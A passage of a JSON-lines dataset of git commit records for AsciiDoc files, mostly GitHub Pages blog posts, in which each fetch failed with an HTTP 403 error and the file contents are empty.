cringler\/cringler.github.io,iwakuralai-n\/badgame-site,shutas\/shutas.github.io,eyalpost\/eyalpost.github.io,romanegunkov\/romanegunkov.github.io,laura-arreola\/laura-arreola.github.io,xquery\/xquery.github.io,Murazaki\/murazaki.github.io,deformat\/deformat.github.io,cncgl\/cncgl.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,allancorra\/allancorra.github.io,vs4vijay\/vs4vijay.github.io,Murazaki\/murazaki.github.io,dakeshi\/dakeshi.github.io,raghakot\/raghakot.github.io,allancorra\/allancorra.github.io,dfjs\/dfjs.github.io,JithinPavithran\/JithinPavithran.github.io,rdspring1\/rdspring1.github.io,alchemistcookbook\/alchemistcookbook.github.io,devkamboj\/devkamboj.github.io,cloudmind7\/cloudmind7.github.com,TinkeringAlways\/tinkeringalways.github.io,Oziabr\/Oziabr.github.io,juliosueiras\/juliosueiras.github.io,willnewby\/willnewby.github.io,laura-arreola\/laura-arreola.github.io,izziiyt\/izziiyt.github.io,hutchr\/hutchr.github.io,carlomorelli\/carlomorelli.github.io,nanox77\/nanox77.github.io,djengineerllc\/djengineerllc.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,jaganz\/jaganz.github.io,Aferide\/Aferide.github.io,deunz\/deunz.github.io,ricardozanini\/ricardozanini.github.io,IndianLibertarians\/indianlibertarians.github.io,dakeshi\/dakeshi.github.io,marioandres\/marioandres.github.io,rishipatel\/rishipatel.github.io,quangpc\/quangpc.github.io,ecommandeur\/ecommandeur.github.io,MartinAhrer\/martinahrer.github.io,jia1miao\/jia1miao.github.io,ilyaeck\/ilyaeck.github.io,minicz\/minicz.github.io,nicolasmaurice\/nicolasmaurice.github.io,IdoramNaed\/idoramnaed.github.io,sandersky\/sandersky.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,dvmoomoodv\/hubpress.io,coder-ze\/coder-ze.github.io,railsdev\/railsdev.github.io,emtudo\/emtudo.github.io,tr00per\/tr00per.github.io,quangpc\/quangpc.github.io,blogforfun\/blogforfun.github.io,zouftou\/zouftou.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,remi-hernandez\/remi-hernandez.github.io,vs4vijay\/vs4vijay.github.io,gorjason\/gorjason.github.io,cmolitor\/blog,thomaszahr\/thomaszahr.github.io,ImpossibleBlog\/impossibleblog.github.io,harvard-visionlab\/harvard-visionlab.github.io,minicz\/minicz.github.io,SuperMMX\/supermmx.github.io,Roen00\/roen00.github.io,Olika120\/Olika120.github.io,endymion64\/endymion64.github.io,jcsirot\/hubpress.io,costalfy\/costalfy.github.io,bluenergy\/bluenergy.github.io,olavloite\/olavloite.github.io,tr00per\/tr00per.github.io,vendanoapp\/vendanoapp.github.io,xfarm001\/xfarm001.github.io,osada9000\/osada9000.github.io,javathought\/javathought.github.io,chrizco\/chrizco.github.io,Andy4Craft\/andy4craft.github.io,Roen00\/roen00.github.io,cloudmind7\/cloudmind7.github.com,masonc15\/masonc15.github.io,olavloite\/olavloite.github.io,raytong82\/raytong82.github.io,markfetherolf\/markfetherolf.github.io,jborichevskiy\/jborichevskiy.github.io,sfoubert\/sfoubert.github.io,ovo-6\/ovo-6.github.io,backemulus\/backemulus.github.io,buliaoyin\/buliaoyin.github.io,peter-lawrey\/peter-lawrey.github.io,fuhrerscene\/fuhrerscene.github.io,devkamboj\/devkamboj.github.io,yuyudhan\/yuyudhan.github.io,jonathandmoore\/jonathandmoore.github.io,jarbro\/jarbro.github.io,LearningTools\/LearningTools.github.io,livehua\/livehua.github.io,pyxozjhi\/pyxozjhi.github.io,kay\/kay.github.io,dvbnrg\/dvbnrg.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,sfoubert\/sfoubert.github.io,fasigpt\/fasigpt.github.io,kunicmarko20\/kunicmarko20.github.io,TinkeringAlways\/tinkeringalways.github.io,DominikVogel\/DominikVogel.github.io,karcot\/trial1,zestyroxy\/zestyroxy.github.io,minditech\/minditech.github.io,timelf123\/timelf123.github.io,jarcane\/jarcane.github.io,kubevirt\/blog,nanox77\/nanox77.github.io,deivisk\/deivisk.github.io,ioisup\/ioisup.github.io,PertuyF\/PertuyF.github.io,topranks\/topranks.github.io,soyabeen\/soyabeen.github.io,InformatiQ\/informatiq.github.io,richard-popham\/richard-popham.github.io,HubPress\/hubpress.io,anshu92\/blog,chris1234p\/chris1234p.github.io,cothan\/cothan.github.io,kfkelvinng\/kfkelvinng.github.io,sinemaga\/sinemaga.github.io,dobin\/dobin.github.io,christianmtr\/christianmtr.github.io,nbourdin\/nbourdin.github.io,spikebachman\/spikebachman.github.io,debbiezhu\/debbiezhu.github.io,bithunshal\/shalsblog,jonathandmoore\/jonathandmoore.github.io,saptaksen\/saptaksen.github.io,reggert\/reggert.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,raloliver\/raloliver.github.io,ashelle\/ashelle.github.io,raditv\/raditv.github.io,lifengchuan2008\/lifengchuan2008.github.io,roelvs\/roelvs.github.io,neocarvajal\/neocarvajal.github.io,timyklam\/timyklam.github.io,ghostbind\/ghostbind.github.io,arthurmolina\/arthurmolina.github.io,wushaobo\/wushaobo.github.io,ImpossibleBlog\/impossibleblog.github.io,YJSoft\/yjsoft.github.io,cmolitor\/blog,siarlex\/siarlex.github.io,dobin\/dobin.github.io,PertuyF\/PertuyF.github.io,iwakuralai-n\/badgame-site,wiibaa\/wiibaa.github.io,emilio2hd\/emilio2hd.github.io,kunicmarko20\/kunicmarko20.github.io,gjagush\/gjagush.github.io,quangpc\/quangpc.github.io,sgalles\/sgalles.github.io,TelfordLab\/telfordlab.github.io,juliosueiras\/juliosueiras.github.io,jborichevskiy\/jborichevskiy.github.io,minditech\/minditech.github.io,twentyTwo\/twentyTwo.github.io,minditech\/minditech.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,metasean\/blog,grzrobak\/grzrobak.github.io,metasean\/blog,tkountis\/tkountis.github.io,pamasse\/pamasse.github.io,acristyy\/acristyy.github.io,christianmtr\/christianmtr.github.io,thockenb\/thockenb.github.io,saptaksen\/saptaksen.github.io,datumrich\/datumrich.github.io,chaseey\/chaseey.github.io,manikmagar\/manikmagar.github.io,Kif11\/Kif11.github.io,xfarm001\/xfarm001.github.io,BulutKAYA\/bulutkaya.github.io,djengineerllc\/djengineerllc.github.io,blahcadepodcast\/blahcadepodcast.github.io,scholzi94\/scholzi94.github.io,lifengchuan2008\/lifengchuan2008.github.io,KozytyPress\/kozytypress.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,amuhle\/amuhle.github.io,rballan\/rballan.github.io,uskithub\/uskithub.github.io,minditech\/minditech.github.io,jarbro\/jarbro.github.io,iwangkai\/iwangkai.github.io,jtsiros\/jtsiros.github.io,chris1234p\/chris1234p.github.io,DullestSaga\/dullestsaga.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,mattburnin\/hubpress.io,mager19\/mager19.github.io,BulutKAYA\/bulutkaya.github.io,bluenergy\/bluenergy.github.io,sebbrousse\/sebbrousse.github.io,flavienliger\/flavienliger.github.io,dingboopt\/dingboopt.github.io,SingularityMatrix\/SingularityMatrix.github.io,nbourdin\/nbourdin.github.io,MartinAhrer\/martinahrer.github.io,2wce\/2wce.github.io,gdfuentes\/gdfuentes.github.io,cloudmind7\/cloudmind7.github.com,itsallanillusion\/itsallanillusion.github.io,blahcadepodcast\/blahcadepodcast.github.io,SingularityMatrix\/SingularityMatrix.github.io,iwangkai\/iwangkai.github.io,fasigpt\/fasigpt.github.io,ElteHupkes\/eltehupkes.github.io,xavierdono\/xavierdono.github.io,faldah\/faldah.github.io,lyqiangmny\/lyqiangmny.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,crimarde\/crimarde.github.io,akr-optimus\/akr-optimus.github.io,pzmarzly\/pzmarzly.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,buliaoyin\/buliaoyin.github.io,jonathandmoore\/jonathandmoore.github.io,kwpale\/kwpale.github.io,MichaelIT\/MichaelIT.github.io,costalfy\/costalfy.github.io,PierreBtz\/pierrebtz.github.io,livehua\/livehua.github.io,raisedadead\/hubpress.io,raloliver\/raloliver.github.io,sandersky\/sandersky.github.io,dvbnrg\/dvbnrg.github.io,emilio2hd\/emilio2hd.github.io,endymion64\/VinJBlog,yahussain\/yahussain.github.io,zestyroxy\/zestyroxy.github.io,AgustinQuetto\/AgustinQuetto.github.io,Mentaxification\/Mentaxification.github.io,kwpale\/kwpale.github.io,wushaobo\/wushaobo.github.io,amuhle\/amuhle.github.io,kr-b\/kr-b.github.io,Olika120\/Olika120.github.io,unay-cilamega\/unay-cilamega.github.io,thefreequest\/thefreequest.github.io,prateekjadhwani\/prateekjadhwani.github.io,ahopkins\/amhopkins.com,FilipLaz\/filiplaz.github.io,tedbergeron\/hubpress.io,alick01\/alick01.github.io,rohithkrajan\/rohithkrajan.github.io,tofusoul\/tofusoul.github.io,mnishihan\/mnishihan.github.io,innovation-jp\/innovation-jp.github.io,skeate\/skeate.github.io,ImpossibleBlog\/impossibleblog.github.io,deunz\/deunz.github.io,pamasse\/pamasse.github.io,cothan\/cothan.github.io,lovian\/lovian.github.io,patricekrakow\/patricekrakow.github.io,murilo140891\/murilo140891.github.io,roamarox\/roamarox.github.io,diogoan\/diogoan.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,marioandres\/marioandres.github.io,tofusoul\/tofusoul.github.io,chowwin\/chowwin.github.io,carsnwd\/carsnwd.github.io,mattpearson\/mattpearson.github.io,sandersky\/sandersky.github.io,roobyz\/roobyz.github.io,wattsap\/wattsap.github.io,dsp25no\/blog.dsp25no.ru,nickwanhere\/nickwanhere.github.io,jaredmorgs\/jaredmorgs.github.io,wattsap\/wattsap.github.io,roamarox\/roamarox.github.io,ghostbind\/ghostbind.github.io,CreditCardsCom\/creditcardscom.github.io,hytgbn\/hytgbn.github.io,deivisk\/deivisk.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,YJSoft\/yjsoft.github.io,codechunks\/codechunks.github.io,wiibaa\/wiibaa.github.io,richard-popham\/richard-popham.github.io,rishipatel\/rishipatel.github.io,sebasmonia\/sebasmonia.github.io,unay-cilamega\/unay-cilamega.github.io,blackgun\/blackgun.github.io,raghakot\/raghakot.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,gjagush\/gjagush.github.io,MatanRubin\/MatanRubin.github.io,DominikVogel\/DominikVogel.github.io,xvin3t\/xvin3t.github.io,ElteHupkes\/eltehupkes.github.io,polarbill\/polarbill.github.io,fqure\/fqure.github.io,oppemism\/oppemism.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,ovo-6\/ovo-6.github.io,Aerodactyl\/aerodactyl.github.io,hitamutable\/hitamutable.github.io,HiDAl\/hidal.github.io,tjfy1992\/tjfy1992.github.io,kai-cn\/kai-cn.github.io,Bulletninja\/bulletninja.github.io,willyb321\/willyb321.github.io,grzrobak\/grzrobak.github.io,eyalpost\/eyalpost.github.io,fbruch\/fbruch.github.com,izziiyt\/izziiyt.github.io,ciekawy\/ciekawy.github.io,dfjs\/dfjs.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,faldah\/faldah.github.io,severin31\/severin31.github.io,deformat\/deformat.github.io,laposheureux\/laposheureux.github.io,doochik\/doochik.github.io,thrasos\/thrasos.github.io,allancorra\/allancorra.github.io,crimarde\/crimarde.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yahussain\/yahussain.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,introspectively\/introspectively.github.io,eduardo76609\/eduardo76609.github.io,mkaptein172\/mkaptein172.github.io,hytgbn\/hytgbn.github.io,sidmusa\/sidmusa.github.io,ecmeyva\/ecmeyva.github.io,StefanBertels\/stefanbertels.github.io,iamthinkking\/iamthinkking.github.io,cothan\/cothan.github.io,elvarb\/elvarb.github.io,s-f-ek971\/s-f-ek971.github.io,skeate\/skeate.github.io,cringler\/cringler.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,2wce\/2wce.github.io,rage5474\/rage5474.github.io,mattpearson\/mattpearson.github.io,bitcowboy\/bitcowboy.github.io,deivisk\/deivisk.github.io,sebbrousse\/sebbrousse.github.io,metasean\/blog,neuni\/neuni.github.io,JithinPavithran\/JithinPavithran.github.io,vs4vijay\/vs4vijay.github.io,iwangkai\/iwangkai.github.io,tjfy1992\/tjfy1992.github.io,pysaumont\/pysaumont.github.io,arthurmolina\/arthurmolina.github.io,txemis\/txemis.github.io,rushil-patel\/rushil-patel.github.io,tamakinkun\/tamakinkun.github.io,romanegunkov\/romanegunkov.github.io,sinemaga\/sinemaga.github.io,jivank\/jivank.github.io,Nekothrace\/nekothrace.github.io,topicusonderwijs\/topicusonderwijs.github.io,kreids\/kreids.github.io,pdudits\/pdudits.github.io,rballan\/rballan.github.io,RaphaelSparK\/RaphaelSparK.github.io,siarlex\/siarlex.github.io,itsashis4u\/hubpress.io,murilo140891\/murilo140891.github.io,fqure\/fqure.github.io,itsashis4u\/hubpress.io,joelcbailey\/joelcbailey.github.io,oldkoyot\/oldkoyot.github.io,oppemism\/oppemism.github.io,cringler\/cringler.github.io,cncgl\/cncgl.github.io,iveskins\/iveskins.github.io,fuzzy-logic\/fuzzy-logic.github.io,iamthinkking\/iamthinkking.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,karcot\/trial1,siarlex\/siarlex.github.io,s-f-ek971\/s-f-ek971.github.io,hytgbn\/hytgbn.github.io,gardenias\/sddb.com,oppemism\/oppemism.github.io,gdfuentes\/gdfuentes.github.io,manikmagar\/manikmagar.github.io,anshu92\/blog,Driven-Development\/Driven-Development.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,AppHat\/AppHat.github.io,adler-j\/adler-j.github.io,SuperMMX\/supermmx.github.io,gardenias\/sddb.com,wayr\/wayr.github.io,pwlprg\/pwlprg.github.io,uskithub\/uskithub.github.io,tamakinkun\/tamakinkun.github.io,deruelle\/deruelle.github.io,endymion64\/endymion64.github.io,scottellis64\/scottellis64.github.io,alimasyhur\/alimasyhur.github.io,joelcbailey\/joelcbailey.github.io,AppHat\/AppHat.github.io,OctavioMaia\/octaviomaia.github.io,willyb321\/willyb321.github.io,icthieves\/icthieves.github.io,cothan\/cothan.github.io,eyalpost\/eyalpost.github.io,jtsiros\/jtsiros.github.io,jia1miao\/jia1miao.github.io,endymion64\/VinJBlog,jivank\/jivank.github.io,quangpc\/quangpc.github.io,chaseey\/chaseey.github.io,devananda\/devananda.github.io,timelf123\/timelf123.github.io,mkorevec\/mkorevec.github.io,tjfy1992\/tjfy1992.github.io,codingkapoor\/codingkapoor.github.io,fuzzy-logic\/fuzzy-logic.github.io,gquintana\/gquintana.github.io,thomasgwills\/thomasgwills.github.io,debbiezhu\/debbiezhu.github.io,miroque\/shirokuma,carlomorelli\/carlomorelli.github.io,pokev25\/pokev25.github.io,darsto\/darsto.github.io,ecommandeur\/ecommandeur.github.io,birvajoshi\/birvajoshi.github.io,seatones\/seatones.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,gdfuentes\/gdfuentes.github.io,birvajoshi\/birvajoshi.github.io,Bulletninja\/bulletninja.github.io,ghostbind\/ghostbind.github.io,TinkeringAlways\/tinkeringalways.github.io,jarcane\/jarcane.github.io,itsashis4u\/hubpress.io,txemis\/txemis.github.io,patricekrakow\/patricekrakow.github.io,neurodiversitas\/neurodiversitas.github.io,tamakinkun\/tamakinkun.github.io,kimkha-blog\/kimkha-blog.github.io,fadlee\/fadlee.github.io,neocarvajal\/neocarvajal.github.io,macchandev\/macchandev.github.io,metasean\/hubpress.io,gquintana\/gquintana.github.io,plaidshirtguy\/plaidshirtguy.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,zakkum42\/zakkum42.github.io,dingboopt\/dingboopt.github.io,alchemistcookbook\/alchemistcookbook.github.io,roobyz\/roobyz.github.io,theblankpages\/theblankpages.github.io,DullestSaga\/dullestsaga.github.io,mmhchan\/mmhchan.github.io,mikealdo\/mikealdo.github.io,mmhchan\/mmhchan.github.io,qu85101522\/qu85101522.github.io,crimarde\/crimarde.github.io,emilio2hd\/emilio2hd.github.io,sidmusa\/sidmusa.github.io,pzmarzly\/g2zory,minicz\/minicz.github.io,xquery\/xquery.github.io,velo\/velo.github.io,chrizco\/chrizco.github.io,dannylane\/dannylane.github.io,mnishihan\/mnishihan.github.io,nnn-dev\/nnn-dev.github.io,pokev25\/pokev25.github.io,MatanRubin\/MatanRubin.github.io,blogforfun\/blogforfun.github.io,lmcro\/hubpress.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,nanox77\/nanox77.github.io,thomasgwills\/thomasgwills.github.io,shutas\/shutas.github.io,yahussain\/yahussain.github.io,timelf123\/timelf123.github.io,nbourdin\/nbourdin.github.io,diogoan\/diogoan.github.io,kimkha-blog\/kimkha-blog.github.io,itsallanillusion\/itsallanillusion.github.io,juliosueiras\/juliosueiras.github.io,hoernschen\/hoernschen.github.io,HiDAl\/hidal.github.io,alexbleasdale\/alexbleasdale.github.io,hutchr\/hutchr.github.io,hoernschen\/hoernschen.github.io,neurodiversitas\/neurodiversitas.github.io,scottellis64\/scottellis64.github.io,hirako2000\/hirako2000.github.io,Easter-Egg\/Easter-Egg.github.io,fadlee\/fadlee.github.io,akoskovacsblog\/akoskovacsblog.github.io,tkountis\/tkountis.github.io,ahopkins\/amhopkins.com,chdask\/chdask.github.io,YannDanthu\/YannDanthu.github.io,neocarvajal\/neocarvajal.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,thomasgwills\/thomasgwills.github.io,mkorevec\/mkorevec.github.io,kr-b\/kr-b.github.io,drankush\/drankush.github.io,parkowski\/parkowski.github.io,raisedadead\/hubpress.io,pokev25\/pokev25.github.io,wayr\/wayr.github.io,willyb321\/willyb321.github.io,laura-arreola\/laura-arreola.github.io,mozillahonduras\/mozillahonduras.github.io,gorjason\/gorjason.github.io,kreids\/kreids.github.io,warpcoil\/warpcoil.github.io,tr00per\/tr00per.github.io,ashelle\/ashelle.github.io,chrizco\/chrizco.github.io,alchemistcookbook\/alchemistcookbook.github.io,Tekl\/tekl.github.io,cothan\/cothan.github.io,jmelfi\/jmelfi.github.io,thockenb\/thockenb.github.io,angilent\/angilent.github.io,kay\/kay.github.io,pallewela\/pallewela.github.io,blayhem\/blayhem.github.io,kfkelvinng\/kfkelvinng.github.io,simevidas\/simevidas.github.io,jbutzprojects\/jbutzprojects.github.io,railsdev\/railsdev.github.io,sinemaga\/sinemaga.github.io,fqure\/fqure.github.io,nnn-dev\/nnn-dev.github.io,SingularityMatrix\/SingularityMatrix.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,Murazaki\/murazaki.github.io,kfkelvinng\/kfkelvinng.github.io,dsp25no\/blog.dsp25no.ru,Brzhk\/Brzhk.github.io,doochik\/doochik.github.io,tedroeloffzen\/tedroeloffzen.github.io,ComradeCookie\/comradecookie.github.io,sebasmonia\/sebasmonia.github.io,djmdata\/djmdata.github.io,sebasmonia\/sebasmonia.github.io,yuyudhan\/yuyudhan.github.io,sskorol\/sskorol.github.io,TunnyTraffic\/gh-hosting,nicolasmaurice\/nicolasmaurice.github.io,emtudo\/emtudo.github.io,zhuo2015\/zhuo2015.github.io,HubPress\/hubpress.io,SuperMMX\/supermmx.github.io,hytgbn\/hytgbn.github.io,uzuyh\/hubpress.io,warpcoil\/warpcoil.github.io,nilsonline\/nilsonline.github.io,mkaptein172\/mkaptein172.github.io,txemis\/txemis.github.io,AppHat\/AppHat.github.io,johannewinwood\/johannewinwood.github.io,zestyroxy\/zestyroxy.github.io,DullestSaga\/dullestsaga.github.io,kosssi\/blog,cncgl\/cncgl.github.io,wushaobo\/wushaobo.github.io,qeist\/qeist.github.io,Oziabr\/Oziabr.github.io,willyb321\/willyb321.github.io,deivisk\/deivisk.github.io,Dhuck\/dhuck.github.io,pzmarzly\/pzmarzly.github.io,DominikVogel\/DominikVogel.github.io,flug\/flug.github.io,spikebachman\/spikebachman.github.io,tofusoul\/tofusoul.github.io,3991\/3991.github.io,nilsonline\/nilsonline.github.io,jbrizio\/jbrizio.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,xfarm001\/xfarm001.github.io,flug\/flug.github.io,thomaszahr\/thomaszahr.github.io,iamthinkking\/iamthinkking.github.io,oppemism\/oppemism.github.io,ComradeCookie\/comradecookie.github.io,kr-b\/kr-b.github.io,apalkoff\/apalkoff.github.io,MichaelIT\/MichaelIT.github.io,gjagush\/gjagush.github.io,mikealdo\/mikealdo.github.io,hitamutable\/hitamutable.github.io,blogforfun\/blogforfun.github.io,nilsonline\/nilsonline.github.io,deunz\/deunz.github.io,rage5474\/rage5474.github.io,realraindust\/realraindust.github.io,pysysops\/pysysops.github.io,oldkoyot\/oldkoyot.github.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a440b28868176367cb87f136d1869800738ea77","subject":"KOGITO-5289 Kogito DRL guide","message":"KOGITO-5289 Kogito DRL guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/kogito-drl.adoc","new_file":"docs\/src\/main\/asciidoc\/kogito-drl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"475773249dceab42d046a70e978b9f92cfc0c38d","subject":":sparkles: better-es5","message":":sparkles: better-es5\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/better-es5.adoc","new_file":"src\/refills\/javascript\/better-es5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afc4e5f0f740948fe7dc773100748a0812c03ac6","subject":"y2b create post EA Sports Active 2 Unboxing \\u0026 Overview","message":"y2b create post EA Sports Active 2 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-20-EA-Sports-Active-2-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-20-EA-Sports-Active-2-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"416b52083d2357b950b3428364bf8e5548d0a23a","subject":"Update README","message":"Update README\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"9842231dd554d630eaae05e26afbe1ebb93b15ac","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"337a041f2019ce937d2c2dd5bc4a54b4b5d11064","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5b5986c84ca9351728797cbeadc7a0e7418929f","subject":"Update 2017-06-28-Test-post-2017.adoc","message":"Update 2017-06-28-Test-post-2017.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-06-28-Test-post-2017.adoc","new_file":"_posts\/2017-06-28-Test-post-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f22daa2e321b4a9025f53bc3b428b9b6c8a0790","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ef9e4607b2405d43c893eef0b1d086ef20704c4","subject":"Update 2016-02-26-Test.adoc","message":"Update 2016-02-26-Test.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Test.adoc","new_file":"_posts\/2016-02-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98e2700444b209bef388aa6afec1204095bdd052","subject":"y2b create post World's Smallest Bluetooth Speaker!","message":"y2b create post World's Smallest Bluetooth Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-09-Worlds-Smallest-Bluetooth-Speaker.adoc","new_file":"_posts\/2016-03-09-Worlds-Smallest-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6945e6f43ef02a06efe842097d44f27e57222c4d","subject":"Update 2017-07-15-Number-letter-count-Projeto-Euler.adoc","message":"Update 2017-07-15-Number-letter-count-Projeto-Euler.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4079e4f265f468f96b80815b370df8d74a41f970","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92c4f14540bf43ef562912a57aca6c85f962e6c4","subject":"Update 2017-07-11-the-students-outpost-about.adoc","message":"Update 2017-07-11-the-students-outpost-about.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"082fba0e8cb120013c230e43af83eeec452e7243","subject":"Import release notes for Groovy 1.8","message":"Import release notes for Groovy 